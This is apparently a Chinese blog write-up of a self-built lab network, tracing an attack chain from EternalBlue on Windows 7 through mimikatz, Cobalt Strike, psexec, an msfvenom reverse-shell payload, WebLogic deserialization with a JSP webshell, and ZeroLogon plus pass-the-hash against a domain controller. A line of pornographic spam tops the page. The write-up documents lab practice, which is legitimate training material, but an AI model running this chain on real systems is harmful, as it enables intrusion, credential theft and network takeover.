国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

記一次靶場(chǎng)搭建與滲透測(cè)試

這篇具有很好參考價(jià)值的文章主要介紹了記一次靶場(chǎng)搭建與滲透測(cè)試。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

滲透目標(biāo)

通過Windows7打入工作組環(huán)境,穿透兩層內(nèi)網(wǎng)拿到DC(域控制器)權(quán)限
環(huán)境搭建

環(huán)境搭建

網(wǎng)絡(luò)拓?fù)?/h4>

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

虛擬機(jī)網(wǎng)絡(luò)配置

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

滲透測(cè)試

永恒之藍(lán)外網(wǎng)打點(diǎn)

nmap -sS 192.168.2.0/24掃描外網(wǎng)存活主機(jī),發(fā)現(xiàn)兩臺(tái)主機(jī)192.168.2.128和192.168.2.129,并且445端口都是打開的,可能存在永恒之藍(lán)漏洞
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
用msf來進(jìn)行永恒之藍(lán)漏洞的利用:search ms17-010
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
選擇模塊3來進(jìn)行永恒之藍(lán)漏洞的掃描:use 3,發(fā)現(xiàn)主機(jī)192.168.2.128存在永恒之藍(lán)漏洞

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
接著使用攻擊模塊對(duì)這個(gè)漏洞進(jìn)行利用use exploit/windows/smb/ms17_010_eternalblue,同樣設(shè)置set rhosts=192.168.2.12
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
權(quán)限已經(jīng)是SYSTEM權(quán)限,簡(jiǎn)單查看一下系統(tǒng)信息,發(fā)現(xiàn)在一個(gè)工作組內(nèi)(Domain: WORKGROUP)
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
導(dǎo)入mimikatz,嘗試獲取票據(jù)或者明文密碼信息,得到密碼:xiaodi
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

Cobalt Strike上線Windows 7

關(guān)閉防火墻
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
開啟teamserver
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
客戶端連接永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
設(shè)置listener并且生成一個(gè)包含這個(gè)listener的木馬
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
將木馬上傳到外網(wǎng)的Windows 7靶機(jī)并執(zhí)行,靶機(jī)成功上線,查看網(wǎng)絡(luò)
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
直接跑mimikatz得到密碼xiaodi
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

psexec橫向移動(dòng)到Windows 10

然后用Portscan掃描主機(jī)
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
執(zhí)行完掃描后,Targets中會(huì)出現(xiàn)主機(jī)192.168.2.129,使用psexec進(jìn)行橫向,輸入剛剛得到的用戶名和密碼:
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
成功拿下Windows10
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
收集相關(guān)信息,發(fā)現(xiàn)新的網(wǎng)段192.168.3.*
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
掃描一下端口,發(fā)現(xiàn)兩臺(tái)主機(jī),一臺(tái)192.168.3.128是這臺(tái)Windows 10,另一臺(tái)就是下一階段的目標(biāo)192.168.3.129
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

MSF上線Windows 10

先生成一個(gè)反向木馬:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=6666 -f exe -o m2.exe
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
通過Cobalt Strike上傳木馬

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
msf設(shè)置監(jiān)聽
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
成功上線,查看路由信息
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
添加路由
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
設(shè)置socks代理
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全配置kaili的全局代理工具proxychains

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

Weblogic打入win12

利用工具:https://github.com/rabbitmask/WeblogicScan
換成另一種代理方式,利用Cobalt Strike上代理
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
同樣修改mousepad /etc/proxychains4.conf,配置好端口,再用
proxychains4 python WeblogicScan.py -u 192.168.3.129 -p 7001啟動(dòng),發(fā)現(xiàn)存在weblogic相關(guān)的CVE漏洞
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

存在cve-2016-0638,存在cve-2017-10271,存在cve-2017-3506等
然后利用工具:https://github.com/shack2/javaserializetools/releases,
proxychains4 java -jar javaserializetools.jar運(yùn)行jar包,檢測(cè)到漏洞
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
能夠進(jìn)行命令執(zhí)行
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
冰蝎生成jsp木馬永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
上傳生成的jsp木馬
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
連接木馬
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
使用Cobalt Strike中轉(zhuǎn)上線,設(shè)置監(jiān)聽
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
然后生成木馬
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
使用冰蝎上傳木馬執(zhí)行,成功拿下
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
至此拿到了三臺(tái)機(jī)器永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
收集網(wǎng)絡(luò)信息,發(fā)現(xiàn)網(wǎng)段192.168.10.*
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
端口掃描,發(fā)現(xiàn)其他兩臺(tái)機(jī)器:192.168.10.10和192.168.10.12
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

橫向移動(dòng)到Win12-WEB

還是先在weblogic這臺(tái)機(jī)器上跑mimiktaz
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
得到明文密碼Administrator和Admin12345,再來試試橫向移動(dòng)
首先創(chuàng)建一個(gè)監(jiān)聽器,這里由于觀察到上述端口掃描的結(jié)果中445端口是開放的,因此采用SMB類型監(jiān)聽器永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
然后進(jìn)行橫向移動(dòng)永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全因?yàn)槭侵修D(zhuǎn)的,所以有耐心點(diǎn),等待幾分鐘后,連接建立
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
可以看到成功上線Win12-WEB
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
收集Win12-WEB的網(wǎng)絡(luò)信息
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
查看系統(tǒng)信息
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
查看權(quán)限
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

滲透域控

在上一步中192.168.10.*這個(gè)網(wǎng)段三個(gè)機(jī)器已經(jīng)得到了兩個(gè),剩下的192.168.10.10就是我們最后的目標(biāo):DC:域控制器
在Win12-WEB這臺(tái)機(jī)器上查看域控:

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
Nmap掃描一下,沒有發(fā)現(xiàn)特別的服務(wù):

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
然后嘗試尋找DC的相關(guān)漏洞,嘗試cve-2021-1472
首先使用cobalt strike開代理

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
然后配置kali的proxychains4:mousepad /etc/proxychains4.conf
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
掃描一下端口:proxychains4 nmap 192.168.10.10,發(fā)現(xiàn)沒有開什么特殊服務(wù)

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
沒辦法,大海撈針,測(cè)試一下這個(gè)CVE:CVE-2020-1472(https://github.com/SecuraBV/CVE-2020-1472)
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
嘗試?yán)眠@個(gè)漏洞:https://github.com/dirkjanm/CVE-2020-1472,成功置空DC密碼
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
獲取hash值
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全
利用得到的Administrator的hash值:aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3:::來進(jìn)行橫向移動(dòng)
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3 DC$/Administrator@192.168.10.10
拿到域控shell,滲透結(jié)束

永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全

查看網(wǎng)絡(luò)信息
永恒之藍(lán)靶機(jī)搭建,滲透測(cè)試,安全,網(wǎng)絡(luò),web安全文章來源地址http://www.zghlxwxcb.cn/news/detail-817387.html

到了這里,關(guān)于記一次靶場(chǎng)搭建與滲透測(cè)試的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 記一次奇妙的某個(gè)edu滲透測(cè)試

    記一次奇妙的某個(gè)edu滲透測(cè)試

    對(duì)登錄方法的輕視造成一系列的漏洞出現(xiàn),對(duì)接口確實(shí)鑒權(quán)造成大量的信息泄露。從小程序到web端網(wǎng)址的奇妙的測(cè)試就此開始。(文章厚碼,請(qǐng)見諒) 1. 尋找到目標(biāo)站點(diǎn)的小程序 進(jìn)入登錄發(fā)現(xiàn)只需要姓名加學(xué)工號(hào)就能成功登錄,通過googlehack的語法成功找到學(xué)生姓名和學(xué)號(hào),

    2024年04月16日
    瀏覽(28)
  • 記一次網(wǎng)絡(luò)安全滲透測(cè)試實(shí)戰(zhàn)指南

    記一次網(wǎng)絡(luò)安全滲透測(cè)試實(shí)戰(zhàn)指南

    網(wǎng)址已無法訪問,就不貼了 可以使用Fofa,火線,zoomeye,searchcode.com等爬取相關(guān)的資產(chǎn),重點(diǎn)關(guān)注一些有漏洞暴露的框架和服務(wù)例如:泛微,PHP,Tomca,后臺(tái),weblogic等等。之后就主要分三步: 指紋識(shí)別、漏洞驗(yàn)證、漏洞復(fù)現(xiàn)。 指紋識(shí)別很好理解,我們要拿歷史漏洞懟它,首

    2024年02月08日
    瀏覽(51)
  • 通過Kali利用永恒之藍(lán)漏洞目標(biāo)主機(jī)shell,并進(jìn)行部分后滲透操作

    通過Kali利用永恒之藍(lán)漏洞目標(biāo)主機(jī)shell,并進(jìn)行部分后滲透操作

    環(huán)境說明 機(jī)器 ip地址 Kali主機(jī) 192.168.231.129 win7 靶機(jī) 192.168.231.143 1.使用kali虛擬機(jī)作為攻擊機(jī),利用nmap掃描獲取目標(biāo)的IP地址及漏洞,將兩個(gè)機(jī)器包括一個(gè)攻擊機(jī)Kali、win7的網(wǎng)絡(luò)連接模式都是NAT,即在一個(gè)網(wǎng)段里面,然后進(jìn)行掃描網(wǎng)段,查看存活主機(jī),下面是兩臺(tái)機(jī)器的ip地址查

    2024年02月08日
    瀏覽(23)
  • 記錄一次永恒之藍(lán)(ms17-010)漏洞攻擊 【后附msf常用命令】

    記錄一次永恒之藍(lán)(ms17-010)漏洞攻擊 【后附msf常用命令】

    永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國(guó)、俄羅斯、整個(gè)歐洲

    2024年02月12日
    瀏覽(22)
  • 超細(xì)DVWA靶場(chǎng)搭建--(小黑棧滲透測(cè)試初級(jí)篇1)

    超細(xì)DVWA靶場(chǎng)搭建--(小黑棧滲透測(cè)試初級(jí)篇1)

    前言:對(duì)于滲透測(cè)試這塊,最初階段建議先學(xué)習(xí)一下前、后端知識(shí),然后再學(xué)習(xí)一到兩門語言,這樣子方便后續(xù)的成為大佬做好基石。滲透測(cè)試的方向上建議先web滲透?--? APP滲透 --內(nèi)網(wǎng)滲透,多打靶場(chǎng)多理解漏洞的原理和工具的利用,在學(xué)習(xí)的過程中遇到的問題多做筆記和記

    2024年01月21日
    瀏覽(22)
  • 實(shí)訓(xùn)滲透靶場(chǎng)02|3星vh-lll靶機(jī)|vulnhub靶場(chǎng)Node1

    實(shí)訓(xùn)滲透靶場(chǎng)02|3星vh-lll靶機(jī)|vulnhub靶場(chǎng)Node1

    寫在前面: 此博客僅用于記錄個(gè)人學(xué)習(xí)進(jìn)度,學(xué)識(shí)淺薄,若有錯(cuò)誤觀點(diǎn)歡迎評(píng)論區(qū)指出。歡迎各位前來交流。(部分材料來源網(wǎng)絡(luò),若有侵權(quán),立即刪除) netdiscover掃描目的IP 發(fā)現(xiàn)開放端口為22和3000 訪問3000 3000端口是node 對(duì)node.js稍有了解的都知道 3000是node.js的默認(rèn)端口,簡(jiǎn)

    2024年02月13日
    瀏覽(35)
  • BurpSuite實(shí)戰(zhàn)教程01-web滲透安全測(cè)試(靶場(chǎng)搭建及常見漏洞攻防)

    BurpSuite實(shí)戰(zhàn)教程01-web滲透安全測(cè)試(靶場(chǎng)搭建及常見漏洞攻防)

    滲透測(cè)試(Penetration test)即安全工程師模擬黑客,在合法授權(quán)范圍內(nèi),通過信息搜集、漏洞挖掘、權(quán)限提升等行為,對(duì)目標(biāo)對(duì)象進(jìn)行安全測(cè)試(或攻擊),最終找出安全風(fēng)險(xiǎn)并輸出測(cè)試報(bào)告。 Web滲透測(cè)試分為白盒測(cè)試和黑盒測(cè)試,白盒測(cè)試是指目標(biāo)網(wǎng)站的源碼等信息的情況

    2024年02月13日
    瀏覽(27)
  • 一次零基礎(chǔ)靶機(jī)滲透細(xì)節(jié)全程記錄

    一次零基礎(chǔ)靶機(jī)滲透細(xì)節(jié)全程記錄

    ????????在本靶場(chǎng)中,確定目標(biāo)就是使用nmap進(jìn)行ip掃描,確定ip即為目標(biāo),只是針對(duì)此靶場(chǎng)而言。其他實(shí)戰(zhàn)中確定目標(biāo)的方式包括nmap進(jìn)行掃描,但不局限于這個(gè)nmap。 ????????比如平常挖洞使用fofa,天眼查,ip域名等進(jìn)行查,在我們這個(gè)靶場(chǎng)中比如信息收集包括查看源碼

    2024年02月16日
    瀏覽(16)
  • Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場(chǎng)-學(xué)習(xí)筆記

    Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場(chǎng)-學(xué)習(xí)筆記

    目錄 學(xué)習(xí)前言 準(zhǔn)備工作 一、尋找目標(biāo)主機(jī)(信息收集) 二、敏感文件 三、Getshell上傳木馬 用蟻劍進(jìn)行Getshell 四、尋找Linux密碼進(jìn)行ssh連接 五、連接SSH最后一步 六、總結(jié) vulnhub是個(gè)提供各種漏洞平臺(tái)的綜合靶場(chǎng),可供下載多種虛擬機(jī)進(jìn)行下載,本地VM打開即可,像做游戲一樣去

    2024年02月14日
    瀏覽(20)
  • 記一次weblogic-10.3.6.0靶場(chǎng)漏洞利用

    記一次weblogic-10.3.6.0靶場(chǎng)漏洞利用

    進(jìn)入Vuln-Range的weblogic-10.3.6.0靶場(chǎng) 靶場(chǎng)地址后面加上 /console 進(jìn)入后臺(tái)頁面 使用weblogic漏洞利用工具進(jìn)行掃描 刪掉端口后面多余字符,輸入/uddiexplorer/ 右上角圖片新標(biāo)簽頁打開 復(fù)制圖片文件名 到weblogic中查找 輸入 find ./ -name oracle_logo.gif(文件名) 找到的路徑用記事本保存一下 在

    2023年04月18日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包